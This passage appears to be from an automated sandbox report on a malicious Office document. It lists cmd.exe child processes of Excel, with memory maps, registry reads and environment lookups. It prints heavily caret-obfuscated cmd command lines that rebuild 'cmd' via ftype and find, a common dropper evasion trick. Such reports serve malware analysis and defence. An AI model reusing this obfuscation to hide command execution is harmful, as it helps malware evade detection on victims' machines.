)&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )& |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:55, Reason: Child Process |
| Unmonitor | End Time: 00:01:15, Reason: Self Terminated |
| Monitor Duration | 00:00:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb1c |
| Parent PID | 0x8e4 (c:\program files\microsoft office\root\office16\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B20
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00970fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x01d7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d80000 | 0x01d80000 | 0x020c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x020d0000 | 0x0239efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (35)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Open | STD_OUTPUT_HANDLE | - |
|
20 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 26 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7988 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xb50, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CMD.Exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:15 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 123677 |
|
1 |
Environment (53)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = ^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O , |
|
1 | |
| Get Environment String | name = ^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^ |
|
1 | |
| Get Environment String | name = ^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^ |
|
1 | |
| Get Environment String | name = ^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^ |
|
1 | |
| Get Environment String | name = ^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^ |
|
1 | |
| Get Environment String | name = ^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^ |
|
1 | |
| Get Environment String | name = ^R^en^6^w^L^P^jy^{^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^ |
|
1 | |
| Get Environment String | name = R^en6w^L^P^j^y^{^7^y^jU^6^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^ |
|
1 | |
| Get Environment String | name = ^R^en^6^w^L^P^j^y^{^7^y^j^U6^ |
|
1 | |
| Get Environment String | name = ^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^ |
|
1 | |
| Get Environment String | name = .^Y^.^Y^6^j^U^e/`^6^K^w^L^,^ |
|
1 | |
| Get Environment String | name = ^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^ |
|
1 | |
| Get Environment String | name = ^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^ |
|
1 | |
| Get Environment String | name = ^w^L^]^6^7^y^j^U^6^ |
|
1 | |
| Get Environment String | name = ^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^ |
|
1 | |
| Get Environment String | name = ^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^ |
|
1 | |
| Get Environment String | name = e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^ |
|
1 | |
| Get Environment String | name = ^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^ |
|
1 | |
| Get Environment String | name = ^=^T!)&& (, ; , ;, ( , ; , (^S^e^T ^ ^ ^ ^}^\=^!^[^$^#^?^ |
|
1 | |
| Get Environment String | name = ^!) , )&& ( , (^S^e^t ^ ^ ^*^}=^!^*^.^@^ |
|
1 | |
| Get Environment String | name = ^g; ; , ^iN , ( ,'; ; ^^ft^^Y^^p^^e ;; , ^|, , ^^f^^iN^^d^^S^^t^^r ;^^c^^m '; ,) , ; ^d^o, , ;; ; (^e^c^h^O , |
|
1 | |
| Get Environment String | name = ^*^[^-^, |
|
1 | |
| Get Environment String | name = | |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #4: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ^f^t^Yp^e | ^f^IN^d "SHCm" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb38 |
| Parent PID | 0xb1c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B3C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00790fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x01b9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ba0000 | 0x01ba0000 | 0x01ee2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01ef0000 | 0x021befff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xb40, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\find.exe | os_pid = 0xb48, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e40000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
